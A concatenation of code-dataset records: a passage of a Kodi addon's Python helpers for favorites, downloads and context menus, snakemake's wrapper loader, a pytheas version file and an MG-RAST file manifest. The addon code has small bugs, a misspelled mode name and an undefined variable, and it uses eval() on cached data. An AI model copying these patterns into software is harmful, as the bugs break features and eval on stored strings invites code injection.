#LB['mode']=McFA; LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='1';
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Films - Movies'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
if TyP=='movie':
LB['subfav']=''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
else:
for nn in ['2']: #,'3','4','5','6','7']:
LB['subfav']=nn;
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Seriale - TV Shows'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
#LB['mode']=McFA; LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#LB['mode']=McFA; LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#LB['mode']=McFA; LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#LB['mode']=McFA; LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#LB['mode']=McFA; LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
if (tfalse(addst("CMI_RefreshMetaData","true"))==True): LB['mode']='refresh_meta'; LabelName='Refresh MetaData'; LB['imdb_id']=LB['commonid']; LB['alt_id']='imdbnum'; LB['video_type']='tvshow'; LB['year']; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
except: pass
return contextMenuItems
def ContextMenu_Episodes(labs={}):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Episode Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_Hosts(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Host Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloaderResolver"))==True: contextMenuItems.append(('JDownloader (UrlResolver)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'true')))
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'false')))
if ('destfile' in labs) and (len(addst('download_folder_default','')) > 0):
contextMenuItems.append(('Download','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',urllib.quote_plus(labs['url']),'true',urllib.quote_plus(addst('download_folder_default','')),urllib.quote_plus(labs['destfile']) ) ))
#elif ('title' in labs) and (len(addst('download_folder_default','')) > 0):
return contextMenuItems
def ContextMenu_LiveStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Stream Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_VideoUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDowfnloader',urllib.quote_plus(labs['url']),'false')))
#contextMenuItems.append(('Downloader','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',labs['url'],'false','','')))
return contextMenuItems
def ContextMenu_ImageUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioRadioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def XBMC_RunPlugin(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.RunPlugin(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
def XBMC_ContainerUpdate(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.Container.Update(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
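# Illustrative usage (params are placeholders): run this addon in the background vs.
# navigating the container to a new listing:
#   XBMC_RunPlugin(_addon_id,'mode=AddVisit&title='+urllib.quote_plus('Some Show'))
#   XBMC_ContainerUpdate(_addon_id,'mode=Search&title='+urllib.quote_plus('Some Show'))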
### ############################################################################################################
### ############################################################################################################
def SendTo_JDownloader(url,useResolver=True):
myNote('Download','sending to jDownloader plugin',15000)
if useResolver==True:
try:
import urlresolver
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
xbmc.executebuiltin("XBMC.RunPlugin(plugin://plugin.program.jdownloader/?action=addlink&url=%s)" % link)
try: _addon.resolve_url(url)
except: pass
### ############################################################################################################
### ############################################################################################################
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import c_HiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
def ExtractThis(filename,destpath):
import c_Extract as extract
return extract.allNoProgress(filename,destpath)
def DownloadThis(url,destfile,destpath,useResolver=True):
destpath=xbmc.translatePath(destpath)
import c_HiddenDownloader as downloader
debob(str(useResolver))
if useResolver==True:
try:
import urlresolver
#debob(urlresolver.HostedMediaFile(url))
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
deb('downloadable url',link)
downloader.download(link,destfile,destpath,useResolver)
#downloader.download(url,destfile,destpath,useResolver)
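# Illustrative usage (file/folder names are placeholders): resolve a hoster page url
# with urlresolver first, then hand the direct link to the hidden downloader:
#   DownloadThis(url,'episode01.mp4',addst('download_folder_default',''),useResolver=True)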
### ############################################################################################################
### ############################################################################################################
def XBMC_RefreshRSS(): xbmc.executebuiltin("XBMC.RefreshRSS()")
def XBMC_EjectTray(): xbmc.executebuiltin("XBMC.EjectTray()")
def XBMC_Mute(): xbmc.executebuiltin("XBMC.Mute()")
def XBMC_System_Exec(url): xbmc.executebuiltin("XBMC.System.Exec(%s)" % url)
def XBMC_System_ExecWait(url): xbmc.executebuiltin("XBMC.System.ExecWait(%s)" % url)
def XBMC_PlayDVD(): xbmc.executebuiltin("XBMC.PlayDVD()")
def XBMC_ReloadSkin(): xbmc.executebuiltin("XBMC.ReloadSkin()")
def XBMC_UpdateAddonRepos(): xbmc.executebuiltin("XBMC.UpdateAddonRepos()")
def XBMC_UpdateLocalAddons(): xbmc.executebuiltin("XBMC.UpdateLocalAddons()")
def XBMC_Weather_Refresh(): xbmc.executebuiltin("XBMC.Weather.Refresh()")
def XBMC_ToggleDebug(): xbmc.executebuiltin("XBMC.ToggleDebug()")
def XBMC_Minimize(): xbmc.executebuiltin("XBMC.Minimize()")
def XBMC_ActivateScreensaver(): xbmc.executebuiltin("XBMC.ActivateScreensaver()")
### ############################################################################################################
### ############################################################################################################
def fav__COMMON__empty(site,section,subfav=''): WhereAmI('@ Favorites - Empty - %s%s' % (section,subfav)); favs=[]; cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); myNote(bFL('Favorites'),bFL('Your Favorites Have Been Wiped Clean. Bye Bye.'))
def fav__COMMON__remove(site,section,name,year,subfav=''):
WhereAmI('@ Favorites - Remove - %s%s' % (section,subfav)); deb('fav__remove() '+section,name+' ('+year+')'); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); tf=False
if saved_favs:
favs=eval(saved_favs)
if favs:
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def fav__COMMON__add(site,section,name,year='',img=_artIcon,fanart=_artFanart,subfav='',plot='',commonID='',commonID2='',ToDoParams='',Country='',Genres='',Url=''):
debob(['fav__add()',section,name+' ('+year+')',img,fanart]); WhereAmI('@ Favorites - Add - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]; fav_found=False
if saved_favs:
#debob(saved_favs)
favs=eval(saved_favs)
if favs:
#debob(favs)
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year):
fav_found=True;
if len(year) > 0: myNote(bFL(section+': '+name.upper()+' ('+year+')'),bFL('Already in your Favorites'));
else: myNote(bFL(section+': '+name.upper()),bFL('Already in your Favorites'));
return
#
deb('Adding Favorite',site+' - '+section+' - '+subfav)
debob(['name',name,'year',year,'img',img,'fanart',fanart,'Country',Country,'Url',Url,'plot',plot,'Genres',Genres,'site',site,'subfav',subfav,'section',section,'ToDoParams',ToDoParams,'commonID',commonID,'commonID2',commonID2])
favs.append((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
##if (section==ps('section.tvshows')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],_param['dbid']))
##elif (section==ps('section.movie')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],''))
##else: myNote('Favorites: '+section,'Section not Found')
#
cache.set('favs_'+site+'__'+section+subfav+'__', str(favs));
if len(year) > 0: myNote(bFL(name+' ('+year+')'),bFL('Added to Favorites'))
else: myNote(bFL(name),bFL('Added to Favorites'))
#
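# Illustrative usage (site/section names are placeholders): favorites are serialized into
# StorageServer under the key 'favs_'+site+'__'+section+subfav+'__':
#   fav__COMMON__add('mysite','TvShows','Some Show',year='2012',img=_artIcon)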
def fav__COMMON__list_fetcher(site,section='',subfav=''):
WhereAmI('@ Favorites - List - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]
if saved_favs:
debob('saved_favs found'); debob(saved_favs); favs=sorted(eval(saved_favs), key=lambda fav: (fav[1],fav[0]),reverse=True); ItemCount=len(favs)
if favs:
debob('favs found'); debob(favs);
return favs
## ((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
#for (name,year,img,fanart,country,url,plot,genre,dbid) in favs:
# except: deb('Error Listing Item',name+' ('+year+')')
# else: myNote('Favorites: '+section,'Section not found');
#if (section==ps('section.tvshows')): set_view('tvshows',addst('anime-view'),True)
#elif (section==ps('section.movie')): set_view('movies' ,addst('movies-view'),True)
else: return ''
else: return ''
#
def fav__COMMON__check(site,section,name,year,subfav=''):
saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__');
if saved_favs:
favs=eval(saved_favs);
if favs:
#debob(favs);
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
#if (name==_name) and (year==_year): return True
if (name==_name): return True
return False
else: return False
else: return False
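# Illustrative usage: note the membership test matches on title only (the year
# comparison above is commented out):
#   if fav__COMMON__check('mysite','TvShows','Some Show','2012'): deb('fav','already saved')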
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
def filename_filter_colorcodes(name=''):
if ('[/color]' in name): name=name.replace('[/color]','')
if ('[/COLOR]' in name): name=name.replace('[/COLOR]','')
if ('[color lime]' in name): name=name.replace('[color lime]','')
if ('[COLOR lime]' in name): name=name.replace('[COLOR lime]','')
if ('[COLOR green]' in name): name=name.replace('[COLOR green]','')
if ('[COLOR yellow]' in name): name=name.replace('[COLOR yellow]','')
if ('[COLOR red]' in name): name=name.replace('[COLOR red]','')
if ('[b]' in name): name=name.replace('[b]','')
if ('[B]' in name): name=name.replace('[B]','')
if ('[/b]' in name): name=name.replace('[/b]','')
if ('[/B]' in name): name=name.replace('[/B]','')
if ('[cr]' in name): name=name.replace('[cr]','')
if ('[CR]' in name): name=name.replace('[CR]','')
if ('[i]' in name): name=name.replace('[i]','')
if ('[I]' in name): name=name.replace('[I]','')
if ('[/i]' in name): name=name.replace('[/i]','')
if ('[/I]' in name): name=name.replace('[/I]','')
if ('[uppercase]' in name): name=name.replace('[uppercase]','')
if ('[UPPERCASE]' in name): name=name.replace('[UPPERCASE]','')
if ('[lowercase]' in name): name=name.replace('[lowercase]','')
if ('[LOWERCASE]' in name): name=name.replace('[LOWERCASE]','')
name=name.strip()
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
return name
def Download_PrepExt(url,ext='.flv'):
if '.zip' in url: ext='.zip' #Compressed Files
elif '.rar' in url: ext='.rar'
elif '.z7' in url: ext='.z7'
elif '.png' in url: ext='.png' #images
elif '.jpg' in url: ext='.jpg'
elif '.gif' in url: ext='.gif'
elif '.bmp' in url: ext='.bmp'
elif '.jpeg' in url: ext='.jpeg'
elif '.mp4' in url: ext='.mp4' #Videos
elif '.mpeg' in url: ext='.mpeg'
elif '.avi' in url: ext='.avi'
elif '.flv' in url: ext='.flv'
elif '.wmv' in url: ext='.wmv'
elif '.mp3' in url: ext='.mp3' #others
elif '.txt' in url: ext='.txt'
#else: ext='.flv' #Default File Extention ('.flv')
return ext
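# Illustrative usage: picks a file extension from the url, defaulting to '.flv':
#   Download_PrepExt('http://host/video.mp4?token=1')  -->  '.mp4'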
### ############################################################################################################
### ############################################################################################################
def visited_DoCheck(urlToCheck,s='[B][COLOR yellowgreen]@[/COLOR][/B] ',e='[COLOR black]@[/COLOR] '):
#visited_empty()
#return ''
vc=visited_check(urlToCheck)
if (vc==True): return s
else:
##visited_add(urlToCheck)
return e
def visited_check(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if (urlToCheck in visits): return True
return False
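# Illustrative usage: the visited store is a flat list of title/url strings kept in
# StorageServer under the key 'visited_':
#   visited_add('Some Show 1x01'); visited_check('Some Show 1x01')  -->  True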
def visited_check2(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if visits:
for (title) in visits:
if (urlToCheck in title): return True
return False
def visited_empty():
saved_favs = cache.get('visited_')
favs = []
cache.set('visited_', str(favs))
notification('[B][COLOR orange]Visited[/COLOR][/B]','[B] Your Visited Data has been wiped clean. Bye Bye.[/B]')
def visited_remove(urlToRemove):
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
visits = eval(saved_visits)
if visits:
#print visits; print urlToRemove
for (title) in visits:
if (urlToRemove==title):
visits.remove((urlToRemove));
cache.set('visited_', str(visits))
#RefreshList();
return
##########
##if saved_favs:
## favs=eval(saved_favs)
## if favs:
## for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
## if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
## if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
## else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def visited_add(urlToAdd):
if (urlToAdd==''): return ''
elif (urlToAdd==None): return ''
    deb('checking whether url has been visited',urlToAdd)
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
#deb('saved visits',saved_visits)
visits = eval(saved_visits)
if visits:
if (urlToAdd) in visits: return
visits.append((urlToAdd))
cache.set('visited_', str(visits))
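# Illustrative flow for the visited-tracking helpers above: visited_add(url)
# appends the url to the cached 'visited_' list; visited_check(url) then
# returns True, so visited_DoCheck(url) yields the 'seen' marker prefix
# instead of the 'unseen' one when list labels are built.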
def wwCMI(cMI,ww,t): #for Watched State ContextMenuItems
sRP='XBMC.RunPlugin(%s)'; site=addpr("site"); section=addpr("section");
if ww==7:
cMI.append(("Unmark",sRP % _addon.build_plugin_url({'mode':'RemoveVisit','title':t,'site':site,'section':section})))
cMI.append(("Empty Visits",sRP % _addon.build_plugin_url({'mode':'EmptyVisit','site':site,'section':section})))
elif ww==6:
cMI.append(("Mark",sRP % _addon.build_plugin_url({'mode':'AddVisit','title':t,'site':site,'section':section})))
return cMI
### ############################################################################################################
### ############################################################################################################
def refresh_meta(video_type,old_title,imdb,alt_id,year,new_title=''):
try: from metahandler import metahandlers
except: return
__metaget__=metahandlers.MetaData()
if new_title: search_title=new_title
else: search_title=old_title
if video_type=='tvshow':
api=metahandlers.TheTVDB(); results=api.get_matching_shows(search_title); search_meta=[]
for item in results: option={'tvdb_id':item[0],'title':item[1],'imdb_id':item[2],'year':year}; search_meta.append(option)
else: search_meta=__metaget__.search_movies(search_title)
debob(search_meta); #deb('search_meta',search_meta);
option_list=['Manual Search...']
for option in search_meta:
if 'year' in option: disptitle='%s (%s)' % (option['title'],option['year'])
else: disptitle=option['title']
option_list.append(disptitle)
dialog=xbmcgui.Dialog(); index=dialog.select('Choose',option_list)
if index==0: refresh_meta_manual(video_type,old_title,imdb,alt_id,year)
elif index > -1:
new_imdb_id=search_meta[index-1]['imdb_id']
#Temporary workaround for metahandlers problem:
#Error attempting to delete from cache table: no such column: year
if video_type=='tvshow': year=''
try: _1CH.log(search_meta[index-1])
except: pass
__metaget__.update_meta(video_type,old_title,imdb,year=year); xbmc.executebuiltin('Container.Refresh')
def refresh_meta_manual(video_type,old_title,imdb,alt_id,year):
keyboard=xbmc.Keyboard()
if year: disptitle='%s (%s)' % (old_title,year)
else: disptitle=old_title
keyboard.setHeading('Enter a title'); keyboard.setDefault(disptitle); keyboard.doModal()
if keyboard.isConfirmed():
search_string=keyboard.getText()
refresh_meta(video_type,old_title,imdb,alt_id,year,search_string)
### ############################################################################################################
### ############################################################################################################
def DoE(e): xbmc.executebuiltin(E)
def DoA(a): xbmc.executebuiltin("Action(%s)" % a)
### ############################################################################################################
### ############################################################################################################
| [
"[email protected]"
]
| |
a7db7a35a129dddef9b0cb830716ebca4fed85be | 42366c1e36038bf879652b4f4c45c6105209a738 | /snakemake/wrapper.py | 52b1c95f9256a8db894ea389c38ad40fd4bec165 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | endrebak/snakemake_dev | e22989e40d475250a1f6e44421290b75dcaf6651 | 846cad1273de7cf43a25fc210174ce43dfd45a8a | refs/heads/master | 2021-01-13T16:01:30.593695 | 2016-12-14T08:21:22 | 2016-12-14T08:21:22 | 76,775,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | __author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "[email protected]"
__license__ = "MIT"
import os
import posixpath
from snakemake.script import script
def is_script(path):
return path.endswith("wrapper.py") or path.endswith("wrapper.R")
def get_path(path, prefix=None):
if not (path.startswith("http") or path.startswith("file:")):
if prefix is None:
prefix = "https://bitbucket.org/snakemake/snakemake-wrappers/raw/"
path = prefix + path
return path
def get_script(path, prefix=None):
    path = get_path(path, prefix=prefix)  # forward the prefix so custom wrapper repos are honored
if not is_script(path):
path += "/wrapper.py"
return path
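# Example (illustrative): get_script("0.2.0/bio/samtools/sort") resolves to
# "https://bitbucket.org/snakemake/snakemake-wrappers/raw/0.2.0/bio/samtools/sort/wrapper.py"
# (the default prefix plus the path, with "/wrapper.py" appended because the
# path does not already point at a script).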
def get_conda_env(path):
path = get_path(path)
if is_script(path):
# URLs and posixpaths share the same separator. Hence use posixpath here.
path = posixpath.dirname(path)
return path + "/environment.yaml"
def wrapper(path, input, output, params, wildcards, threads, resources, log, config, rulename, conda_env, prefix):
"""
Load a wrapper from https://bitbucket.org/snakemake/snakemake-wrappers under
the given path + wrapper.py and execute it.
"""
path = get_script(path, prefix=prefix)
script(path, "", input, output, params, wildcards, threads, resources, log, config, rulename, conda_env)
| [
"[email protected]"
]
| |
ca2fa5ad4997c54d0f3874f400a20a3fbfbdaf02 | ccbe341f4bc5f46ce31968a1d764a87f6f6803a8 | /pytheas/__init__.py | 49bf2edb9ecbfe446b859aa5cdeb805ed037f51e | [
"MIT"
]
| permissive | skytreader/pytheas | 8ce1e23965c61aff5eb48a301e9a8e04d3c70a55 | c41cf985827734a1a9be1e61a93fca2a7b14c3d9 | refs/heads/master | 2023-04-09T01:54:24.423483 | 2014-06-03T04:04:35 | 2014-06-03T04:04:35 | 17,976,330 | 0 | 0 | null | 2023-03-31T14:38:58 | 2014-03-21T10:30:38 | Python | UTF-8 | Python | false | false | 156 | py | # Copied from https://github.com/andymccurdy/redis-py/blob/master/redis/__init__.py
__version__ = "0.1.2"
VERSION = tuple(map(int, __version__.split(".")))
| [
"[email protected]"
]
| |
ca15e754c14f4db76db15fe9fb24de4b5692d004 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4459099.3.spec | f64a808352387d76005b2abdd7351b26ddfed579 | []
| no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,321 | spec | {
"id": "mgm4459099.3",
"metadata": {
"mgm4459099.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1797195,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12697,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2985,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1209484,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 579,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 62053,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 2063115,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 417890,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 111447,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 70938,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 747722,
"type": "txt",
